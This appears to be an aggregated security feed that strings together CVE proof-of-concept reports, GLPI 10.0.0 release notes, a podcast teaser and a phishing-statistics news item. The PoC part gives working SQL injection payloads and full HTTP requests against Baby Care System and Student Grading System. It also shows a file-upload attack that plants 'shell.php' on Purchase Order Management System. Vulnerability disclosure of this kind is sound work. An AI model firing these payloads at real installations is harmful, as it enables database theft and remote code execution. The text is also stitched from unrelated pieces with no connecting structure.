Baby Care System v1.0 was discovered to contain a SQL injection vulnerability via /admin/uesrs.php&action=display&value=Show&userid=.

**Body Care System has SQL injection vulnerability**

vendor: https://www.sourcecodester.com/php/14622/baby-care-system-phpmysqli-full-source-code.html

Vulnerability file: /BabyCare/admin/uesrs.php&action=display&value=Show&userid=

![image](https://user-images.githubusercontent.com/54017627/161356353-ed05fce2-7ad0-4f82-ba55-eddd9a8948ea.png)

Vulnerability location: /BabyCare/admin.php?id=users&action=display&value=Show&userid=3 //uesrid is Injection point

\[+\]Payload: /BabyCare/admin.php?id=users&action=display&value=Show&userid=3%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)--+ //userid is Injection point

GET /BabyCare/admin.php?id\=users&action\=display&value\=Show&userid\=3%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)\--\+ HTTP/1.1
Host: 192.168.1.19
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=h48mjnelp4g0935821l2k3g5ne
Connection: close

![image](https://user-images.githubusercontent.com/54017627/161356273-40a840aa-a8d6-4dfd-a8e9-b766d9ee15ed.png)

\--\-
Parameter: userid (GET)
    Type: boolean\-based blind
    Title: MySQL RLIKE boolean\-based blind \- WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id\=users&action\=display&value\=Show&userid\=3' RLIKE (SELECT (CASE WHEN (8387=8387) THEN 3 ELSE 0x28 END))-- qMWa
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=users&action=display&value=Show&userid=3' AND (SELECT 1354 FROM(SELECT COUNT(\*),CONCAT(0x71627a7871,(SELECT (ELT(1354\=1354,1))),0x7171707671,FLOOR(RAND(0)\*2))x FROM INFORMATION\_SCHEMA.PLUGINS GROUP BY x)a)\-- hxjb

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: id\=users&action\=display&value\=Show&userid\=3' AND (SELECT 8907 FROM (SELECT(SLEEP(5)))qpmN)-- ZPdb
\---

![image](https://user-images.githubusercontent.com/54017627/161356374-752599b1-a482-4ad3-b355-672f3db669af.png)

CVE-2022-28433: bug_report/SQLi-16.md at main · k0xx11/bug_report

Baby Care System v1.0 was discovered to contain a SQL injection vulnerability via /admin/uesrs.php&action=type&userrole=Admin&userid=3.

**Body Care System has SQL injection vulnerability**

vendor: https://www.sourcecodester.com/php/14622/baby-care-system-phpmysqli-full-source-code.html

Vulnerability file: /BabyCare/admin/uesrs.php&action=type&userrole=Admin&userid=3

![image](https://user-images.githubusercontent.com/54017627/161356632-c3f8fb12-4696-437f-8827-ee3edf86aac8.png)

Vulnerability location: /BabyCare/admin.php?id=users&action=type&userrole=Admin&userid=3 //uesrid is Injection point

\[+\]Payload: /BabyCare/admin.php?id=users&action=type&userrole=Admin&userid=3%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)--+ //userid is Injection point

GET /BabyCare/admin.php?id\=users&action\=type&userrole\=Admin&userid\=3%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)\--\+ HTTP/1.1
Host: 192.168.1.19
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=h48mjnelp4g0935821l2k3g5ne
Connection: close

![image](https://user-images.githubusercontent.com/54017627/161356539-57cb5e80-5591-43f1-b23b-4cd120494c85.png)

\--\-
Parameter: userid (GET)
    Type: boolean\-based blind
    Title: MySQL RLIKE boolean\-based blind \- WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id\=users&action\=type&userrole\=Admin&userid\=3' RLIKE (SELECT (CASE WHEN (7538=7538) THEN 3 ELSE 0x28 END))-- NbTT
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=users&action=type&userrole=Admin&userid=3' AND (SELECT 2325 FROM(SELECT COUNT(\*),CONCAT(0x71717a7a71,(SELECT (ELT(2325\=2325,1))),0x7170787171,FLOOR(RAND(0)\*2))x FROM INFORMATION\_SCHEMA.PLUGINS GROUP BY x)a)\-- WVHM

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: id\=users&action\=type&userrole\=Admin&userid\=3' AND (SELECT 2980 FROM (SELECT(SLEEP(5)))vKGr)-- qZsw
\---

![image](https://user-images.githubusercontent.com/54017627/161356602-ed01f524-7a1f-465d-abe7-8d3f6ce7cd38.png)

CVE-2022-28437: bug_report/SQLi-18.md at main · k0xx11/bug_report

Student Grading System v1.0 was discovered to contain a SQL injection vulnerability via /student-grading-system/rms.php?page=school_year.

Permalink

Cannot retrieve contributors at this time

**Student-grading-system v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/14522/student-grading-system-using-phpmysql-source-code.html

Vulnerability File: /student-grading-system/rms.php?page=school\_year

Vulnerability location: /student-grading-system/rms.php?page=school\_year,sy

\[+\] Pyaload: id=4&sy=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+&status=%E4%B8%8D

POST /student\-grading\-system/rms.php?page\=school\_year HTTP/1.1
Host: 192.168.1.19
Content\-Length: 71
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
Origin: http://192.168.1.19
Content\-Type: application/x\-www\-form\-urlencoded
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.1.19/student-grading-system/rms.php?page=school\_year
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=lpvr00hu9v7v4dvs4atvc5gdg6
Connection: close
id=4&sy=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+&status=%E4%B8%8D

CVE-2022-28025: bug_report/SQLi-2.md at main · k0xx11/bug_report

Baby Care System v1.0 was discovered to contain a SQL injection vulnerability via /admin.php?id=siteoptions&social=display&value=0&sid=2.

**Body Care System has SQL injection vulnerability**

vendor: https://www.sourcecodester.com/php/14622/baby-care-system-phpmysqli-full-source-code.html

Vulnerability file: /BabyCare/admin/siteoptions.php&social=display&value=0&sid=2

![image](https://user-images.githubusercontent.com/54017627/161355656-51fc1533-645f-475f-9543-f1b8cfda034c.png)

Vulnerability location: /BabyCare/admin.php?id=siteoptions&social=display&value=0&sid=2 //sid is Injection point

\[+\]Payload: /BabyCare/admin.php?id=siteoptions&social=display&value=0&sid=2%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)--+ //sid is Injection point

GET /BabyCare/admin.php?id\=siteoptions&social\=display&value\=0&sid\=2%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)\--\+ HTTP/1.1
Host: 192.168.1.19
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=h48mjnelp4g0935821l2k3g5ne
Connection: close

![image](https://user-images.githubusercontent.com/54017627/161355572-19eb6a66-cf68-4973-913c-f7b3fed27099.png)

\--\-
Parameter: sid (GET)
    Type: boolean\-based blind
    Title: MySQL RLIKE boolean\-based blind \- WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id\=siteoptions&social\=display&value\=0&sid\=2' RLIKE (SELECT (CASE WHEN (1596=1596) THEN 2 ELSE 0x28 END))-- vRBd
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: id=siteoptions&social=display&value=0&sid=2' AND EXTRACTVALUE(9578,CONCAT(0x5c,0x716a7a6a71,(SELECT (ELT(9578\=9578,1))),0x717a717871))\-- BkeH

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: id\=siteoptions&social\=display&value\=0&sid\=2' AND (SELECT 4775 FROM (SELECT(SLEEP(5)))Cixw)-- gPVs
\---

![image](https://user-images.githubusercontent.com/54017627/161355637-70b6ae74-0250-4b8f-94f9-6bbfb07f6f1f.png)

CVE-2022-28432: bug_report/SQLi-13.md at main · k0xx11/bug_report

Student Grading System v1.0 was discovered to contain a SQL injection vulnerability via /student-grading-system/rms.php?page=grade.

**Student-grading-system v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/14522/student-grading-system-using-phpmysql-source-code.html

Vulnerability File: /student-grading-system/rms.php?page=grade

Vulnerability location: /student-grading-system/rms.php?page=grade,id

\[+\] Pyaload: id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+&grade=1' and updatexml(1,concat(0x7e,(select version()),0x7e),0)--+

POST /student\-grading\-system/rms.php?page\=grade HTTP/1.1
Host: 192.168.1.19
Content\-Length: 133
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
Origin: http://192.168.1.19
Content\-Type: application/x\-www\-form\-urlencoded
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.1.19/student-grading-system/rms.php?page=grade
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=lpvr00hu9v7v4dvs4atvc5gdg6
Connection: close
id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+&grade=1' and updatexml(1,concat(0x7e,(select version()),0x7e),0)--+

CVE-2022-28024: bug_report/SQLi-1.md at main · k0xx11/bug_report

Student Grading System v1.0 was discovered to contain a SQL injection vulnerability via /student-grading-system/rms.php?page=student_p&id=.

**Student-grading-system v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/14522/student-grading-system-using-phpmysql-source-code.html

Vulnerability File: /student-grading-system/rms.php?page=student\_p&id=

Vulnerability location: /student-grading-system/rms.php?page=student\_p&id=,id

\[+\] Pyaload: id=1%27%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,database(),11,12,13,14,15,16,CONCAT(0x716a767a71,0x4363574d72716c57514d6f6e626241676a5469757266544a466d704755435841746863464d445244,0x716a787a71),18,19--+-

GET /student\-grading\-system/rms.php?page\=student\_p&id\=1%27%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,database(),11,12,13,14,15,16,CONCAT(0x716a767a71,0x4363574d72716c57514d6f6e626241676a5469757266544a466d704755435841746863464d445244,0x716a787a71),18,19\--+- HTTP/1.1
Host: 192.168.1.19
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=j0d3j11j73v4lm3m8d74g5d3gu
Connection: close

CVE-2022-28026: bug_report/SQLi-3.md at main · k0xx11/bug_report

Purchase Order Management System v1.0 was discovered to contain a remote code execution (RCE) vulnerability via /purchase_order/admin/?page=user.

Permalink

Cannot retrieve contributors at this time

**Purchase-order-management-system v1.0 by oretnom23 has arbitrary code execution (RCE)**

vendors: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html

Vulnerability url: http://ip/purchase\_order/admin/?page=user

Request package for file upload：

POST /purchase\_order/classes/Users.php?f\=save HTTP/1.1
Host: 192.168.1.19
Content\-Length: 799
Accept: \*/\*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarylz8EuWf30x9QqTzc
Origin: http://192.168.1.19
Referer: http://192.168.1.19/purchase\_order/admin/?page=user/manage\_user&id=3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=sils4jibq9sp4e2n7i4joq8to7
Connection: close
\------WebKitFormBoundarylz8EuWf30x9QqTzc
Content-Disposition: form-data; name="id"
3
\------WebKitFormBoundarylz8EuWf30x9QqTzc
Content-Disposition: form-data; name="firstname"
Mike 
\------WebKitFormBoundarylz8EuWf30x9QqTzc
Content-Disposition: form-data; name="lastname"
Williams
\------WebKitFormBoundarylz8EuWf30x9QqTzc
Content-Disposition: form-data; name="username"
mwilliams
\------WebKitFormBoundarylz8EuWf30x9QqTzc
Content-Disposition: form-data; name="password"
\------WebKitFormBoundarylz8EuWf30x9QqTzc
Content-Disposition: form-data; name="type"
2
\------WebKitFormBoundarylz8EuWf30x9QqTzc
Content-Disposition: form-data; name="img"; filename="shell.php"
Content-Type: application/octet-stream
<?php phpinfo();?>
\------WebKitFormBoundarylz8EuWf30x9QqTzc--

The file will be uploaded to the uploads directory

We visit the url of the shell.php file and find that the code has been executed

Url: http://ip/purchase\_order/uploads/1648212480\_shell.php

CVE-2022-28021: bug_report/RCE-1.md at main · k0xx11/bug_report

GLPI is a Free Asset and IT Management Software package, that provides ITIL Service Desk features, licenses tracking and software auditing. In versions prior to 10.0.0 one can use ticket's followups or setup login messages with a stylesheet link. This may allow for a cross site scripting attack vector. This issue is partially mitigated by cors security of browsers, though users are still advised to upgrade.


**GLPI 10.0.0**

![Download it](https://camo.githubusercontent.com/053b51ccb999d639f5d410b00a1ecce916a1f9908c77255d955e623d0233c407/68747470733a2f2f696d672e736869656c64732e696f2f62616467652f31302e302e302d444f574e4c4f41445f474c50492d677265656e2e7376673f6c6f676f3d706870266c6f676f436f6c6f723d7768697465267374796c653d666f722d7468652d6261646765)

We are happy to announce the new major release of GLPI 🥳  
In a few words:

*   New Modern interface with Bootstrap + tabler.io + Twig
*   Redesign of Helpdesk objects
*   Native automatic inventory
*   and more...

![image](https://user-images.githubusercontent.com/418844/164211419-8ed076ea-32c7-4381-b50b-6656e621b025.png)

**Features**

(_Click to expand / see details_)

**New interface**

*   Modern interface by Bootstrap and Tabler
*   Redesign of the timeline of ITIL objects
*   Two new menu display modes: vertical on the left / horizontal at the top
*   "Go to..." button
*   Enhanced Dark Mode
*   Add photos / images for CMDB objects
*   Saved searches: the list is displayed on the left of the search results
*   Saved search: possibility to anchor the list so it does not disappear
*   Saved search: the list is adapted to the browsing context
*   Possibility to completely hide the search criteria block
*   Dynamic refresh (AJAX) of search results
*   Possibility to classify / sort the results of several columns at the same time
*   The titles of the columns of the results remain displayed even if you scroll down the page
*   Option to choose the timeline direction: natural (last followed at bottom) or inverted (last followed at top)
*   Improve browser tab names: now starting with Itemtype and Item ID
*   Browse items by category tree (when this field exists)
*   Add emoticon picker on rich text editor

**Assistance**

*   Kanban view for ITIL objects
*   Linking contracts and tickets
*   Add ability to mention users in ITIL objects
*   Management of "pending status" reasons
*   "Pending status" reasons: option to automatically reissue a ticket
*   "Pending status" reasons: option to automatically close a ticket after X reminders
*   Management of recurring changes
*   New: search criteria "Myself" (assigned to technician - myself)
*   Expanded text for validations
*   Option to anonymize technicians / groups in the simplified interface
*   Observers can now add a follow-up (new right)
*   New massive action to link multiple tickets to a problem
*   Business rules: action to add a task (from a template)
*   Business rules: action to assign an “Application”
*   Business rules: action to modify the global validation status
*   Business rules: “Validation” criteria
*   Add emoticon picker on rich text editor
*   Add task promotion to ticket
*   Business rules: add Writer to RuleTicket Criteria
*   Highlight TTO/TTR only when exceeded
*   Make SolutionTemplate translatable
*   Remove global\_validation field from ITIL forms
*   Knowledge base: several categories per article, target self-service users

**Inventory / CMDB**

*   Native dynamic inventory (retrieving data from inventory agents)
*   Support for partial inventories (an agent can send part of the inventory to GLPI)
*   New objects supported by dynamic inventory (examples: telephones, applications, racks, etc.)
*   Overhaul of import rules and equipment binding
*   Improved management of rejected equipment
*   Possibility of remaking import of refused equipment
*   Automatic action to purge refused equipment
*   Automatic action to purge inventory files
*   Possibility to add PCI / USB vendors (dropdown)
*   Adding database inventory
*   Add device "Camera"
*   Automatic action to remove software versions without installation
*   Automatic action to remove software without versions
*   Possibility to add manual links (in addition to external links)
*   Add PassiveDCEquipment to global search types
*   Add four columns to computers list "Number of \[Monitor/Periph/Printer/Phone\]"
*   Add problems to impact "status" badge
*   Add Color for Expiration Date field for domains & certificates
*   Supplier and contact: add administrative number

**Inventory Agent**

*   New inventory agent "GLPI Agent"
*   Remote inventory without agent installation: WinRM (windows), SSH (Linux/Unix)
*   Local administration interface to the agent (tools / toolbox)
*   New plugins “proxy”, “ssl”, “inventory-collector”
*   New communication protocol in JSON format supporting partial inventory
*   Soon, management of remote inventory tasks, including for ESX polls
*   Improved Windows support including MSI packages
*   Native support for MacOSX Big Sur and the new Apple Silicon M1 chip

**Various**

*   Add vars in templates
*   Possibility to modify the criteria of a saved search
*   Support for authentication with CERT / KEY file for LDAPS
*   Option to set the timeout for LDAP authentications
*   Report of the same modifications on the status.php page
*   Redesign of the Gantt view on Projects
*   Redesign of the “Tools> Reservations” view
*   New button to empty user's synchronization field
*   Button to copy the search results (“Name” column only) to the clipboard
*   Massive actions now are on the old plugins´ page
*   Possibility to export the results of "History" tab in CSV format
*   Improve requirements checks
*   Make rules sortable by drag&drop
*   Display avatars in user list
*   Ability to run massive actions from API
*   Possibility to choose entity / profile from the URL (force\_entity, force\_profile)
*   LDAP User Restoration Process
*   Added changelog icon if plugin declares any (xml:changelog\_url)
*   Added rule action to skip remaining rules
*   Add ability to define From and No-Reply addresses in entity config
*   Ability to disable central warning with define variable `GLPI_CENTRAL_WARNINGS`
*   Add filters for Kanban
*   Drop autocomplete feature on "name" fields

**Console**

*   Added commands for `utf8mb4` migration:
    *   `bin/console glpi:migration:dynamic_row_format` convert database tables to "Dynamic" row format (required for "utf8mb4" character support)
    *   `bin/console glpi:migration:utf8mb4` convert database character set from "utf8" to "utf8mb4"
*   Added command to migrate "signed" INT keys to "unsigned" INT:
    *   `bin/console glpi:migration:unsigned_keys`
*   Improvement of the `system:status` command in the CLI console to:
    *   filter services to monitor (see `list_services` command)
    *   configure the return format (plain-text format / json)
*   Added `list_services` command:
    *   `bin/console glpi:system:list_services` list system services (for `status` command)
*   Added `marketplace` command in CLI console:
    *   `bin/console marketplace:download` download plugin from the GLPI marketplace
    *   `bin/console marketplace:info` get information about a plugin
    *   `bin/console marketplace:search` search GLPI marketplace
*   Added Database Plugin Migration Script:
    *   `bin/console glpi:migration:databases_plugin_to_core`
*   Added `cache` commands:
    *   `bin/console glpi:cache:clear` clear GLPI cache (rename from `glpi:system:clear_cache`)
    *   `bin/console glpi:cache:configure` define cache configuration
    *   `bin/console glpi:cache:debug` debug GLPI cache
    *   `bin/console glpi:cache:set_namespace_prefix` define cache namespace prefix
*   Added `glpi:tools:check_database_*` commands:
    *   `bin/console glpi:tools:check_database_keys` check database for missing and errounous keys
    *   `bin/console glpi:tools:check_database_schema_consistency` check database schema consistency
*   Added `cleansoftware` command:
    *   `bin/console glpi:assets:cleansoftware` remove software versions with no installation and software with no version

**Framework**

*   Removed support for PHP versions lower than 7.3
*   Removed support for MySQL version lower than 5.7
*   Removed support for MariaDB version lower than 10.2
*   Use utf8mb4 MySQL character set
*   Use unsigned INT keys
*   PHP 8.1 compatibility
*   PHP PSR-4 autoload
*   PHP PSR-12
*   Add hook for custom debug tabs (`debug_tabs`)
*   Force usage of node v16 and npm v8
*   Usage of XML-RPC API is deprecated
*   Add getWebDir to twig "Plugin" extension
*   Debug mode: expose SQL warnings
*   Support 'multiple' option for item dropdowns
*   Add a new hook `filter_actors`
*   Add timeline hook for plugins (`show_in_timeline`, `timeline_actions`, `timeline_answer_actions`)
*   Hook constants / Hooks Manager classes
*   Replace TCPDF by mPDF

See full changelog for detail.

CVE-2022-24869: Release 10.0.0 · glpi-project/glpi

Beers with Talos (BWT) Podcast episode No. 120 is now available. Download this episode and subscribe to Beers with Talos:
Apple Podcasts  Google Podcasts  Spotify  StitcherRecorded April 6, 2022
If iTunes and Google Play aren't your thing, click here.
The trend of...


[[ This is only the beginning! Please visit the blog for the complete entry ]]

Beers with Talos, Ep. #120: How attackers are finding ways around MFA

New research shows threat actors increasingly leveraging social networks for attacks, with LinkedIn being used in 52% of global phishing attacks.

Shipping, retail, and tech companies are no longer the most popular brands used to hide phishing attacks. Instead, social media platforms have become the brands of choice used to dupe victims and steal their personal data, with LinkedIn-related lures accounting for a full 52% of all global phishing attacks during January, February, and March of 2022, according to new data.

LinkedIn phishing-lure use exploded by 44% over the previous quarter, when it was used in just 8% of phishing attempts, according to Check Point's latest Brand Phishing Report.

"As well as LinkedIn being the most targeted brand by a considerable margin, WhatsApp maintained its position in the top ten, accounting for almost 1 in 20 phishing-related attacks worldwide," the report said.

Shipping is still a draw, even though LinkedIn overtook DHL as the brand most often used in phishing attacks. DHL is now the second-most abused brand, behind 14% of attempts during the same time period. FedEx moved up from seventh place to fifth over the past quarter, with 6% of all phishing attempts spoofing its brand.

**Check Point's List of Top 10 Abused Brands**  

1.  LinkedIn (accounting for 52% of all global phishing attacks over the quarter)
2.  DHL (14%)
3.  Google (7%)
4.  Microsoft (6%)
5.  FedEx (6%)
6.  WhatsApp (4%)
7.  Amazon (2%)
8.  Maersk (1%)
9.  AliExpress (0.8%)
10.  Apple (0.8%)

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Tag

#apple